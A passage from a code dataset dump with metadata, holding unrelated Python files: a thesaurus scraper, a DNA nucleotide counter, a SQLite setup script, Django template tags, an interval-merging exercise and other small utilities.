pub.publish(mc)","sub_path":"HardwareInterfaces/DataServer.py","file_name":"DataServer.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"423959303","text":"import logging\n\n\nclass SlackRoomIMBase(object):\n def __init__(self, id, sc=None, **kwargs):\n \"\"\"Base class for rooms (channels, groups) and IMs\"\"\"\n self.id = id\n self._sc = sc\n self.logger = logging.getLogger(type(self).__name__)\n self.logger.setLevel(logging.DEBUG)\n","sub_path":"slackminion/slack/room/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"310278777","text":"#!/usr/bin/env python3\n\n\"\"\"\nThis Python script is designed to query a online repository for the\nhypernyms associated with a specific word.\n\"\"\"\n__author__ = 'John Bumgarner'\n__date__ = 'June 12, 2021'\n__status__ = 'Production'\n__license__ = 'MIT'\n__copyright__ = \"Copyright (C) 2021 John Bumgarner\"\n\n##################################################################################\n# Date Initially Completed: June 12, 2021\n# Author: John Bumgarner\n#\n# Date Last Revised: September 17, 
2021\n# Revised by: John Bumgarner\n##################################################################################\n\n\n##################################################################################\n# “AS-IS” Clause\n#\n# Except as represented in this agreement, all work produced by Developer is\n# provided “AS IS”. Other than as provided in this agreement, Developer makes no\n# other warranties, express or implied, and hereby disclaims all implied warranties,\n# including any warranty of merchantability and warranty of fitness for a particular\n# purpose.\n##################################################################################\n\n##################################################################################\n# Python imports required for basic operations\n##################################################################################\nimport bs4\nimport logging\nimport traceback\nfrom bs4 import BeautifulSoup\nfrom backoff import on_exception, expo\nfrom ratelimit import limits, RateLimitException\nfrom wordhoard.utilities.basic_soup import Query\nfrom wordhoard.utilities import caching, cleansing, word_verification\n\nlogger = logging.getLogger(__name__)\n\n\ndef _get_number_of_pages(soup):\n \"\"\"\n This function determines the number of pages that\n contain hypernyms and hyperonyms for a specific word.\n\n :param soup: BeautifulSoup lxml\n :return: number of pages\n :rtype: int\n\n :raises\n\n AttributeError: Raised when an attribute reference or assignment fails.\n\n KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.\n\n TypeError: Raised when an operation or function is applied to an object of inappropriate type.\n \"\"\"\n try:\n number_of_pages = 0\n pages = soup.find('div', {'id': 'pages'})\n if pages is not None:\n list_of_pages = [num for page in pages for num in page if num.isdigit()]\n if len(list_of_pages) != 0:\n number_of_pages = int(list_of_pages[-1]) + 1\n return number_of_pages\n\n except AttributeError as e:\n logger.error('An AttributeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n except KeyError as e:\n logger.error('A KeyError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n except TypeError as e:\n logger.error('A TypeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n\n\ndef _get_hypernyms(soup):\n \"\"\"\n This function queries a HTML table for hypernyms.\n\n :param soup: BeautifulSoup lxml\n :return: set of hypernyms and hyperonyms\n :rtype: set\n\n :raises\n AttributeError: Raised when an attribute reference or assignment fails.\n\n KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.\n\n TypeError: Raised when an operation or function is applied to an object of inappropriate type.\n \"\"\"\n try:\n sub_set = set()\n table = soup.find('table')\n if table:\n rows = table.find_all('tr', {'class': 'theentry'})\n if rows is not None:\n for row in rows:\n cols = row.find('td', {'class': 'abbdef'}).find('a')\n if cols is not None:\n if cols.text != '»':\n sub_set.add(str(cols.text).lower())\n else:\n sub_set.add('no hypernyms found')\n return sub_set\n\n except AttributeError as e:\n logger.error('An AttributeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n except KeyError as e:\n logger.error('A KeyError occurred in the 
following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n except TypeError as e:\n logger.error('A TypeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(e.__traceback__)))\n\n\nclass Hypernyms(object):\n \"\"\"\n This class is used to query online repositories for the hypernyms associated\n with a specific word.\n\n \"\"\"\n\n def __init__(self, search_string='', max_number_of_requests=30, rate_limit_timeout_period=60, proxies=None):\n \"\"\"\n Usage Examples\n ----------\n\n >>> hypernym = Hypernyms('red')\n >>> results = hypernym.find_hypernyms()\n\n >>> hypernym = Hypernyms(search_string='red')\n >>> results = hypernym.find_hypernyms()\n\n Parameters\n ----------\n :param search_string: string containing the variable to obtain hypernyms for\n :param max_number_of_requests: maximum number of requests for a specific timeout_period\n :param rate_limit_timeout_period: the time period before a session is placed in a temporary hibernation mode\n :param proxies: dictionary of proxies to use with Python Requests\n \"\"\"\n self._word = search_string\n self._proxies = proxies\n\n ratelimit_status = False\n self._rate_limit_status = ratelimit_status\n\n # Retries the requests after a certain time period has elapsed\n handler = on_exception(expo, RateLimitException, max_time=60, on_backoff=self._backoff_handler)\n # Establishes a rate limit for making requests to the antonyms repositories\n limiter = limits(calls=max_number_of_requests, period=rate_limit_timeout_period)\n self.find_hypernyms = handler(limiter(self.find_hypernyms))\n\n def _colorized_text(self, r, g, b, text):\n return f\"\\033[38;2;{r};{g};{b}m{text} \\033[38;2;255;255;255m\"\n\n def _backoff_handler(self, details):\n if self._rate_limit_status is False:\n print(self._colorized_text(255, 0, 0,\n 'The hypernym query rate Limit was reached. 
The querying process is entering '\n 'a temporary hibernation mode.'))\n logger.info('The hypernym query rate limit was reached.')\n self._rate_limit_status = True\n\n def _validate_word(self):\n \"\"\"\n This function is designed to validate that the syntax for\n a string variable is in an acceptable format.\n\n :return: True or False\n :rtype bool\n\n \"\"\"\n valid_word = word_verification.validate_word_syntax(self._word)\n if valid_word:\n return valid_word\n else:\n logger.error(f'The word {self._word} was not in a valid format.')\n logger.error(f'Please verify that the word {self._word} is spelled correctly.')\n\n def _check_cache(self):\n check_cache = caching.cache_hypernyms(self._word)\n return check_cache\n\n def _update_cache(self, hypernym):\n caching.insert_word_cache_hypernyms(self._word, hypernym)\n return\n\n def find_hypernyms(self):\n \"\"\"\n Purpose\n ----------\n This function queries classicthesaurus_com for hypernyms associated\n with the specific word provided to the Class Hypernyms.\n\n Returns\n ----------\n :returns:\n hypernym: list of hypernyms\n\n :rtype: list\n\n Raises\n ----------\n :raises\n AttributeError: Raised when an attribute reference or assignment fails.\n\n IndexError: Raised when a sequence subscript is out of range\n\n KeyError: Raised when a mapping (dictionary) key is not found in the set of existing keys.\n\n TypeError: Raised when an operation or function is applied to an object of inappropriate type.\n\n bs4.FeatureNotFound: raised by the BeautifulSoup constructor if no parser with the requested features\n is found\n \"\"\"\n valid_word = self._validate_word()\n if valid_word:\n check_cache = self._check_cache()\n if check_cache is not False:\n hypernym = cleansing.flatten_multidimensional_list([val for val in check_cache.values()])\n return hypernym\n elif check_cache is False:\n try:\n if self._proxies is None:\n response = Query(f'https://www.classicthesaurus.com/{self._word}/broader').get_single_page_html()\n if response.status_code == 404:\n logger.info(f'Classic Thesaurus had no hypernyms reference for the word {self._word}')\n else:\n soup = BeautifulSoup(response.text, \"lxml\")\n hypernym = _get_hypernyms(soup)\n if 'no hypernyms found' in hypernym:\n return f'No hypernyms were found for the word: {self._word}'\n else:\n number_of_pages = _get_number_of_pages(soup)\n if number_of_pages >= 2:\n for page in range(2, number_of_pages):\n sub_html = Query(f'https://www.classicthesaurus.com/{self._word}/broader/{page}').get_single_page_html()\n sub_soup = BeautifulSoup(sub_html.text, 'lxml')\n additional_hypernym = _get_hypernyms(sub_soup)\n if additional_hypernym:\n hypernym.union(additional_hypernym)\n self._update_cache(hypernym)\n return sorted(set(hypernym))\n elif self._proxies is not None:\n response = Query(f'https://www.classicthesaurus.com/{self._word}/broader',\n self._proxies).get_single_page_html()\n if response.status_code == 404:\n logger.info(f'Classic Thesaurus had no hypernyms reference for the word {self._word}')\n else:\n soup = BeautifulSoup(response.text, \"lxml\")\n hypernym = _get_hypernyms(soup)\n if 'no hypernyms found' in hypernym:\n return f'No hypernyms were found for the word: {self._word}'\n else:\n number_of_pages = _get_number_of_pages(soup)\n if number_of_pages >= 2:\n for page in range(2, number_of_pages):\n sub_html = Query(f'https://www.classicthesaurus.com/{self._word}/broader/'\n f'{page}', self._proxies).get_single_page_html()\n sub_soup = BeautifulSoup(sub_html.text, 'lxml')\n additional_hypernym 
= _get_hypernyms(sub_soup)\n if additional_hypernym:\n hypernym.union(additional_hypernym)\n self._update_cache(hypernym)\n return sorted(set(hypernym))\n except bs4.FeatureNotFound as error:\n logger.error('An error occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n except AttributeError as error:\n logger.error('An AttributeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n except IndexError as error:\n logger.error('An IndexError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n except KeyError as error:\n logger.error('A KeyError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n except TypeError as error:\n logger.error('A TypeError occurred in the following code segment:')\n logger.error(''.join(traceback.format_tb(error.__traceback__)))\n","sub_path":"wordhoard/hypernyms.py","file_name":"hypernyms.py","file_ext":"py","file_size_in_byte":12937,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"77137997","text":"import os\n# Clear the console (on Windows)\nos.system('cls')\n\nshopping_list = []\n\nprint ('Type the item you want to add and press Enter. \\nTo print list, type End and then press Enter.')\n\nwhile True:\n shopping_item = input('Enter a new item to add to the list: ')\n if (shopping_item == 'End'):\n break\n shopping_list.append(shopping_item)\n print (str(len(shopping_list)) + ' items in shopping list.\\n')\n\n\nprint (*shopping_list, sep = '\\n')\n","sub_path":"shoppinglist2/shoppinglist.py","file_name":"shoppinglist.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"446865129","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 5 21:00:06 2017\n\n@author: Administrator\n\"\"\"\n\nimport numpy as np\nfrom mayavi import mlab\nfrom mayavi.tools import pipeline\n\n#_IS_AXES=\"Z\"\n_IS_AXES=\"XY\"\n\nx, y, z = np.ogrid[-10:10:20j, -10:10:20j, -10:10:20j]\ns = np.sin(x*y*z)/(x*y*z)\n \nsrc = mlab.pipeline.scalar_field(s)\nif _IS_AXES==\"Z\":\n mlab.pipeline.iso_surface(src, contours=[s.min()+0.1*s.ptp(), ], opacity=0.1)\n mlab.pipeline.iso_surface(src, contours=[s.max()-0.1*s.ptp(), ])\n mlab.pipeline.image_plane_widget(src,\n plane_orientation='z_axes',\n slice_index=10,\n )\nelse:\n mlab.pipeline.image_plane_widget(src,plane_orientation='x_axes',slice_index=10)\n mlab.pipeline.image_plane_widget(src,plane_orientation='y_axes',slice_index=10)\n mlab.outline()\n\nmlab.show()","sub_path":"cn_uni_mooc-3d/SV05V06_scalar.py","file_name":"SV05V06_scalar.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"491467056","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport sys\nimport numpy as np\n\n\npath = sys.argv[1]\ndata = sys.argv[2]\nmapping = sys.argv[3]\nindex = sys.argv[4]\n\nExpressionData= pd.read_table(data, sep = '\\t')\nAccToGene = pd.read_table(mapping, sep = '\\t', header = 0, names = ['Description', 'Gene'])\nIndex = pd.read_csv(index, sep = ',')\n\n\n\nDfMerge_temp = pd.merge(ExpressionData, AccToGene, on = 'Description', how = 'inner')\nDfMerge_edit = DfMerge_temp.drop(['Description'], 1)\nDfMerge_edit = DfMerge_edit.fillna(value = 0)\ncols = 
DfMerge_edit.columns.tolist()\ncols1 = cols[-1:] + cols[:-1]\nDfMerge = DfMerge_edit[cols1]\ndf = DfMerge[DfMerge.Gene != 0]\n\n\nwith open('%sdfoutput.txt'%path, 'a') as dataframe:\n df.to_csv(dataframe, sep= '\\t')\n\n\nIndex = Index.drop(['PR Status','HER2 Status', 'ER Status', 'iTRAQ Experiment number'], 1)\nIndex = Index.replace(['Basal', 'Her2', 'LumA', 'LumB'], [1, 2, 3, 4])\n\n \nwith open('%sindex.txt'%path, 'a') as txt:\n Index.to_csv(txt, sep='\\t')\n\n","sub_path":"Teubl_preprocess.py","file_name":"Teubl_preprocess.py","file_ext":"py","file_size_in_byte":987,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"458813320","text":"from state import State\n\n\nclass Problem:\n @staticmethod\n def _read_graph(filename):\n graph = {}\n file = open(filename)\n n = int(file.readline())\n m = int(file.readline())\n for x in range(n):\n graph[x + 1] = []\n for _ in range(m):\n line = file.readline().split(' ')\n x = int(line[0])\n y = int(line[1])\n graph[x].append(y)\n return graph\n \n def __init__(self):\n self.ggraph = Problem._read_graph(\"input.txt\")\n\n\n @property\n def graph(self):\n return self.ggraph\n\n \n def fit(self, state):\n result = 0\n for node in self.graph:\n if state.colors[node] == 0:\n result += 1000\n for nnode in self.graph[node]:\n if state.colors[node] == state.colors[nnode]:\n result += 1\n return result\n\n\n def gbfs_query(self, state):\n color0 = 0;\n color1 = 0;\n color2 = 0;\n color3 = 0;\n for node in self.graph:\n if state.colors[node] == 0:\n color0 += 1\n if state.colors[node] == 1:\n color1 += 1\n if state.colors[node] == 2:\n color2 += 1\n if state.colors[node] == 3:\n color3 += 1\n result = max(color1, color2, color3) + color0\n return result;\n\n","sub_path":"Artificial Intelligence/lab2/problem.py","file_name":"problem.py","file_ext":"py","file_size_in_byte":1411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"191282677","text":"# coding=utf-8\nimport urlparse, os\n\nfrom django import template\nfrom django.core.urlresolvers import reverse\nfrom django.conf import settings\nfrom django.contrib.sites.models import Site\n\nregister = template.Library()\n\n\n@register.simple_tag\ndef static(filename, flags=''):\n flags = set(f.strip() for f in flags.split(','))\n url = urlparse.urljoin(settings.STATIC_URL, filename)\n if 'absolute' in flags:\n url = _absolute_url(url)\n if (filename.endswith('.css') or filename.endswith('.js')) and 'no-timestamp' not in flags or 'timestamp' in flags:\n fullname = os.path.join(settings.STATIC_ROOT, *filename.split('/'))\n if os.path.exists(fullname):\n url += '?%d' % os.path.getmtime(fullname)\n return url\n\ndef _absolute_url(url):\n if url.startswith('http://') or url.startswith('https://'):\n return url\n domain = Site.objects.get_current().domain\n return 'http://%s%s' % (domain, url)\n\n\n@register.simple_tag\ndef admin_url(instance, action='change'):\n url = 'admin:{}_{}_{}'.format(instance._meta.app_label, instance._meta.module_name, action)\n return reverse(url, args=(instance.id,))\n","sub_path":"sites/raisonne/taghelpers/templatetags/statictags.py","file_name":"statictags.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"46"} +{"seq_id":"570827692","text":"\"\"\"\nDigital Bucket\nsqlite configuration\nBy D. 
Bailey\n\"\"\"\nimport sqlite3\nfrom sqlite3 import Error\n\n# database location on local\ndatabase = \"/Users/DavidBailey/db/pythonsqlite.db\"\n\n# create connection to sqlite database\ndef create_connection(db_file):\n\n try:\n conn = sqlite3.connect(db_file)\n return conn\n except Error as e:\n print(e)\n\n return None\n\nif __name__ == '__main__':\n create_connection(database)\n\n# create table in sqlite database\ndef create_table(conn, create_table_sql):\n try:\n c = conn.cursor()\n c.execute(create_table_sql)\n except Error as e:\n print(e)\n\ndef main():\n\n # create table and columns\n sql_create_events_table = \"\"\" CREATE TABLE IF NOT EXISTS events_pt (\n id integer PRIMARY KEY,\n event text NOT NULL,\n type text,\n complete text,\n lat double,\n long double\n ); \"\"\"\n\n # create a database connection\n conn = create_connection(database)\n create_table(conn, sql_create_events_table)\n\nif __name__ == '__main__':\n main()","sub_path":"sqlite_config.py","file_name":"sqlite_config.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"315864116","text":"#This is a demo script for practice.\n#Author: Bin-Guang Ma; Date: 2015-12-20; modified on 2018-11-23\n\nDNAstr = 'ATGAAACGCATTAGCACCACCATTACCACCACCATCACCATTACCACAGGTAACGGTGCGGGCTGA'\n\nA_num = C_num = G_num = T_num = 0\n\nfor i in range(len(DNAstr)):\n if DNAstr[i]=='A':\n A_num = A_num + 1\n elif DNAstr[i]=='C':\n C_num = C_num + 1\n elif DNAstr[i]=='G':\n G_num += 1 #another way\n elif DNAstr[i]=='T':\n T_num += 1 #another way\n\nprint('A_num =', A_num)\nprint('C_num =', C_num)\nprint('G_num =', G_num)\nprint('T_num =', T_num)\n\ntotal_num = len(DNAstr)\n#total_num = float(total_num)\nprint('A_frq =', A_num/total_num)\nprint('C_frq =', C_num/total_num)\nprint('G_frq =', G_num/total_num)\nprint('T_frq =', T_num/total_num)\n\ndna_dic = {'A': 0, 'C': 0, 'G': 0, 'T': 0} #the dict for DNA numbers\nfor n in DNAstr:\n dna_dic[n] += 1\nprint(dna_dic) #print out the DNA numbers in a dict format\n\ndna_frq_dic = {}\nDNAs = 'ACGT' #the 4 kinds of nucleiotides\nfor d in DNAs: #calculate the frequencies\n dna_frq_dic[d] = dna_dic[d]/total_num\nprint(dna_frq_dic) #print out the DNA frequencies in a dict format\n\n#output the DNA numbers and frequencies to a file\noflname = 'D:/frq.txt'\nofl = open(oflname, 'wt') #open file in a writing and text model\nostr = '\\t'.join(DNAs)\nofl.write(ostr + '\\n')\nostr = ''\nfor d in DNAs:\n ostr += str(dna_dic[d]) + '\\t'\nostr = ostr.strip()\nostr += '\\n'\nofl.write(ostr)\nolst = [] #create a list for DNA frequencies\nfor d in DNAs:\n olst.append(str(dna_frq_dic[d]))\nostr = '\\t'.join(olst) + '\\n'\nofl.write(ostr)\nofl.close() #please check the file C:\\frq.txt to see what you got\n\nprint('done! 
(^_^)')\n\n\n\n\n","sub_path":"Python/python-class/slides/第一周/DNA-frq.py","file_name":"DNA-frq.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"489923318","text":"import FWCore.ParameterSet.Config as cms\nimport os\n\n#--------------------------------------------------------------------------------\n# CV: imports needed by analyzeConfig.py base-class\nfrom tthAnalysis.HiggsToTauTau.configs.recommendedMEtFilters_cfi import *\nfrom tthAnalysis.HiggsToTauTau.configs.EvtYieldHistManager_cfi import *\nfrom tthAnalysis.HiggsToTauTau.configs.hhWeight_cfi import hhWeight\n#--------------------------------------------------------------------------------\n\nprocess = cms.PSet()\n\nprocess.fwliteInput = cms.PSet(\n fileNames = cms.vstring(),\n maxEvents = cms.int32(-1),\n outputEvery = cms.uint32(100)\n)\n\nprocess.fwliteOutput = cms.PSet(\n fileName = cms.string('')\n)\n\nprocess.analyze_hh_bbwwMEM_dilepton = cms.PSet(\n treeName = cms.string('Events'),\n\n skipSelEvents = cms.int32(0),\n maxSelEvents = cms.int32(1000),\n\n process = cms.string(''),\n histogramDir = cms.string(''),\n era = cms.string('2017'),\n\n apply_pileupJetID = cms.string('disabled'),\n\n apply_genWeight = cms.bool(True),\n hasLHE = cms.bool(True),\n\n useAssocJetBtag = cms.bool(False),\n\n lep_mva_cut_mu = cms.double(0.5),\n lep_mva_cut_e = cms.double(0.3),\n lep_mva_wp = cms.string('hh_multilepton'),\n\n jetCleaningByIndex = cms.bool(True),\n\n branchName_electrons = cms.string('Electron'),\n branchName_muons = cms.string('Muon'),\n branchName_jets_ak4 = cms.string('Jet'),\n branchName_jets_ak8 = cms.string('FatJet'),\n branchName_subjets_ak8 = cms.string('SubJet'),\n branchName_met = cms.string('MET'),\n branchName_vertex = cms.string('PV'),\n\n branchName_genLeptons = cms.string('GenLep'),\n branchName_genNeutrinos = cms.string('GenNu'),\n branchName_genJets = cms.string('GenJet'),\n\n # branches specific to HH signal\n branchName_genParticlesFromHiggs = cms.string('GenHiggsDaughters'),\n\n # branches specific to ttbar background\n branchName_genLeptonsFromTop = cms.string('GenLepFromTop'),\n branchName_genNeutrinosFromTop = cms.string('GenNuFromTop'),\n branchName_genBQuarksFromTop = cms.string('GenBQuarkFromTop'),\n\n selEventsFileName_input = cms.string(''),\n selEventsFileName_output = cms.string(''),\n \n # general configuration parameters, required by our analysis framework\n leptonFakeRateWeight = cms.PSet(),\n hhWeight_cfg = hhWeight,\n gen_mHH = cms.vdouble(),\n nonRes_BMs = cms.vstring(),\n\n isDEBUG = cms.bool(False)\n)\n","sub_path":"test/templates/produceMEMNtuple_hh_bb2l_cfg.py","file_name":"produceMEMNtuple_hh_bb2l_cfg.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"589707660","text":"import pandas as pd\r\nimport numpy as np\r\nimport os\r\n\r\nfrom transmogrifier.super_gopher import SuperGopher\r\nfrom db_tools import ezfuncs\r\n\r\nthis_path = os.path.abspath(os.path.dirname(__file__))\r\nrkey = pd.read_excel('{}/config/residual_key.xlsx'.format(this_path))\r\n\r\n\r\ndef compute_global_ratios(year_id, drawcols):\r\n eng = ezfuncs.get_engine(conn_def=\"cod\")\r\n ccv = pd.read_sql(\"\"\"\r\n SELECT output_version_id FROM cod.output_version\r\n WHERE code_version=4 AND is_best=1\"\"\", eng).squeeze()\r\n sg = SuperGopher({\r\n 'file_pattern': '{measure_id}_{location_id}.h5',\r\n 'h5_tablename': 'draws'},\r\n 
'filepath/codcorrect/{ccv}/draws'.format(ccv=ccv))\r\n ylls = sg.content(location_id=1, year_id=year_id, sex_id=[1, 2],\r\n measure_id=4)\r\n\r\n ratios = []\r\n for resid_cid, yldmap in rkey.groupby('input_cause_id'):\r\n # get the ylls\r\n these_ylls = ylls[ylls.cause_id == resid_cid]\r\n ratio_ylls = ylls[ylls.cause_id.isin(yldmap.ratio_cause_id.unique())]\r\n\r\n # aggregate the inputs to the appropriate level\r\n group_cols = ['age_group_id', 'year_id']\r\n these_ylls = these_ylls.groupby(group_cols)\r\n these_ylls = these_ylls[drawcols].sum().mean(axis=1)\r\n ratio_ylls = ratio_ylls.groupby(group_cols)\r\n ratio_ylls = ratio_ylls[drawcols].sum().mean(axis=1)\r\n\r\n # compute the ratio\r\n ratio = these_ylls / ratio_ylls\r\n ratio = ratio.reset_index()\r\n ratio = ratio.replace(np.inf, 0)\r\n ratio = ratio.replace(np.NaN, 0)\r\n\r\n ratio[\"cause_id\"] = resid_cid\r\n ratios.append(ratio)\r\n\r\n df = pd.concat(ratios)\r\n df_male = df.copy()\r\n df_male[\"sex_id\"] = 1\r\n df_female = df.copy()\r\n df_female[\"sex_id\"] = 2\r\n\r\n return df_male.append(df_female)\r\n\r\n\r\ndef calc(location_id, ratio_df, output_type, drawcols, seq_ylds,\r\n cause_ylds):\r\n assert output_type in [\"cause_id\", \"sequela_id\"], (\r\n \"output_type must be cause_id or sequela_id\")\r\n\r\n resids = []\r\n for resid_cid, yldmap in rkey.groupby('input_cause_id'):\r\n\r\n # get the ylds\r\n if yldmap.ratio_level.unique().squeeze() == 'cause':\r\n ylds = cause_ylds[cause_ylds.cause_id.isin(\r\n yldmap.ratio_cause_id.unique())]\r\n else:\r\n ylds = seq_ylds[seq_ylds.sequela_id.isin(\r\n yldmap.ratio_sequela_id.unique())]\r\n\r\n # aggregate the inputs to the appropriate level\r\n group_cols = ['age_group_id', 'year_id', 'sex_id']\r\n ylds = ylds.groupby(group_cols)\r\n ylds = ylds.sum()\r\n\r\n # grab the ratio we want\r\n ratio = ratio_df[ratio_df.cause_id == resid_cid]\r\n ratio = ratio.set_index(group_cols)\r\n ratio = ratio.reindex(ylds.index, fill_value=0)\r\n ratio = ratio[[col for col in ratio if col != \"cause_id\"]]\r\n ratio = pd.DataFrame(\r\n data=pd.np.tile(ratio.values, (1, len(drawcols))),\r\n index=ratio.index,\r\n columns=drawcols)\r\n\r\n # apply the ratio\r\n ylds.ix[:, drawcols] = (ylds[drawcols].values * ratio.values)\r\n ylds = ylds.reset_index()\r\n\r\n # prep for export\r\n ylds[\"location_id\"] = location_id\r\n ylds['measure_id'] = 3\r\n ylds = ylds[\r\n ['measure_id', 'location_id', 'year_id', 'age_group_id',\r\n 'sex_id'] + drawcols]\r\n if output_type == 'cause_id':\r\n ylds['cause_id'] = yldmap.output_cause_id.unique().squeeze()\r\n resids.append(ylds)\r\n else:\r\n ylds['sequela_id'] = yldmap.output_sequela_id.unique().squeeze()\r\n resids.append(ylds)\r\n\r\n return pd.concat(resids)\r\n","sub_path":"shared_code/central_comp/non_fatal/como/como/residuals.py","file_name":"residuals.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"240891876","text":"'''\nProblem Statement \nGiven a list of non-overlapping intervals sorted by their start time, insert a given interval at the correct position and merge all necessary intervals to produce a list that has only mutually exclusive intervals.\n\nExample 1:\n\nInput: Intervals=[[1,3], [5,7], [8,12]], New Interval=[4,6]\nOutput: [[1,3], [4,7], [8,12]]\nExplanation: After insertion, since [4,6] overlaps with [5,7], we merged them into one [4,7].\n\nExample 2:\n\nInput: Intervals=[[1,3], [5,7], [8,12]], New Interval=[4,10]\nOutput: 
[[1,3], [4,12]]\nExplanation: After insertion, since [4,10] overlaps with [5,7] & [8,12], we merged them into [4,12].\n\nExample 3:\n\nInput: Intervals=[[2,3],[5,7]], New Interval=[1,4]\nOutput: [[1,4], [5,7]]\nExplanation: After insertion, since [1,4] overlaps with [2,3], we merged them into one [1,4].\n'''\n\n\n#mycode\ndef insert(intervals, new_interval):\n merged = []\n # TODO: Write your code here\n index=0\n for i in range(len(intervals)):\n \n if intervals[i][1] < new_interval[0]:\n merged.append(intervals[i])\n \n if intervals[i][0] <= new_interval[1] and intervals[i][1] >= new_interval[0]:\n new_interval[0]=min(new_interval[0],intervals[i][0])\n new_interval[1]=max(new_interval[1],intervals[i][1])\n index = i\n\n if intervals[i][0] > new_interval[1]:\n if i==index+1:\n merged.append(new_interval)\n new_interval=[-1,-1]\n merged.append(intervals[i])\n if new_interval != [-1,-1]:\n merged.append(new_interval)\n return merged\n\n\ndef main():\n print(\"Intervals after inserting the new interval: \" + str(insert([[1, 3], [5, 7], [8, 12]], [4, 6])))\n print(\"Intervals after inserting the new interval: \" + str(insert([[1, 3], [5, 7], [8, 12]], [4, 10])))\n print(\"Intervals after inserting the new interval: \" + str(insert([[2, 3], [5, 7]], [1, 4])))\n\n\nmain()\n\n\n\n#answer\ndef insert(intervals, new_interval):\n merged = []\n i, start, end = 0, 0, 1\n\n # skip (and add to output) all intervals that come before the 'new_interval'\n while i < len(intervals) and intervals[i][end] < new_interval[start]:\n merged.append(intervals[i])\n i += 1\n\n # merge all intervals that overlap with 'new_interval'\n while i < len(intervals) and intervals[i][start] <= new_interval[end]:\n new_interval[start] = min(intervals[i][start], new_interval[start])\n new_interval[end] = max(intervals[i][end], new_interval[end])\n i += 1\n\n # insert the new_interval\n merged.append(new_interval)\n\n # add all the remaining intervals to the output\n while i < len(intervals):\n merged.append(intervals[i])\n i += 1\n return merged\n\n\ndef main():\n print(\"Intervals after inserting the new interval: \" + str(insert([[1, 3], [5, 7], [8, 12]], [4, 6])))\n print(\"Intervals after inserting the new interval: \" + str(insert([[1, 3], [5, 7], [8, 12]], [4, 10])))\n print(\"Intervals after inserting the new interval: \" + str(insert([[2, 3], [5, 7]], [1, 4])))\n\n\nmain()\n\n\n'''\nTime complexity \nAs we are iterating through all the intervals only once, the time complexity of the above algorithm is O(N)O, \nwhere ‘N’ is the total number of intervals.\n\nSpace complexity \nThe space complexity of the above algorithm will be O(N) as we need to return a list containing all the merged intervals.\n'''\n","sub_path":"Grokking-the-Coding-Interview-Patterns-for-Coding-Questions/4. 
Pattern Merge Intervals/Insert Interval (medium).py","file_name":"Insert Interval (medium).py","file_ext":"py","file_size_in_byte":3245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"277645400","text":"# -*- coding: utf-8 -*\r\nimport cgi\r\nimport pickle\r\nimport re\r\nimport time\r\n\r\nimport jsonpath as jsonpath\r\nimport pymysql\r\nimport requests\r\nimport json\r\nimport logging\r\nfrom collections import defaultdict\r\nimport textProcess\r\nfrom bs4 import BeautifulSoup\r\nfrom zhon.hanzi import punctuation\r\n\r\nlogging.basicConfig(level=logging.INFO) # ,format = '%(asctime)s - %(name)s - %(levelname)s - %(message)s')\r\nlogging = logging.getLogger(__name__)\r\n\r\n\r\nclass GeoKG():\r\n url = 'http://10.122.141.12:9006/similar'\r\n threshlod=1\r\n def get_sim(self, something):\r\n\r\n r = requests.post(self.url, json={\"ck\": \"synonym\", \"synonym_word\": something, \"synonym_selectedMode\": \"auto\",\r\n \"homoionym_word\": \"\", \"homoionym_selectedMode\": \"auto\", \"homoionym_num\": \"\"})\r\n json = r.json()\r\n result = json['detail']['res']['synonym']\r\n return result\r\n\r\n def parsePlaces(self,nslist):\r\n placelist = []\r\n placelist_ = []\r\n placelist_fullname=[]\r\n for ns in nslist:\r\n if (self.place_dict.get(ns)):\r\n samename = self.place_dict.get(ns)\r\n for p in samename:\r\n place = self.place_index.get(p['id'])\r\n placelist.append(place)\r\n # if (place['name'] == '常熟市'):\r\n # print(place)\r\n if place['name']==ns:\r\n #如果名称与全名相对应\r\n placelist_fullname.append(place)\r\n\r\n if place['level'] != '-1' :\r\n self.addplace(placelist_, place)\r\n # logging.info(str(placelist))\r\n # logging.info(str(placelist_))\r\n return 